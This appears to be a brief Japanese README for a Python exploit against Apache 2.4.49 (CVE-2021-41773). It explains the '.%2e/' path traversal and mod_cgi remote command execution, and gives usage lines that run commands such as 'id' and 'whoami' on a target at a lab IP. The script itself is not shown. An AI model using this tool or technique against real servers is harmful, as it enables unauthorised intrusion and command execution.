
Pythonエクスプロイト:Apache 2.4.49のパストラバーサルおよびRCE(CVE-2021-41773)を対象とし、細工したリクエストを送信して脆弱なサーバー上で任意のコマンドを実行します。
この脆弱性は Apache HTTP Server 2.4.49 のバージョンに影響します。パス検証のエラーにより、リモート攻撃者は .%2e/ のようなシーケンスを使用して、設定されたルートディレクトリ外のパスにアクセスする パストラバーサル を実行できます。
mod_cgi モジュールが有効な場合、攻撃者は特別に細工したリクエストをCGIファイルに送信することで、任意のコマンドを実行 できます。これにより、リモートコード実行 (RCE) が可能になります。
mod_cgi 有効このスクリプトは、影響を受けるサーバーにリモートコマンドを送信して脆弱性を悪用します。
curl インストール済みpython3 exploit.py -i <IP_DEL_SERVIDOR> -c <COMANDO>
python3 exploit.py -i 172.17.0.2 -c "id"
python3 exploit.py -i 172.17.0.2 -c "whoami"
python3 exploit.py -i 172.17.0.2 -c "cd ../../../ && ls -la"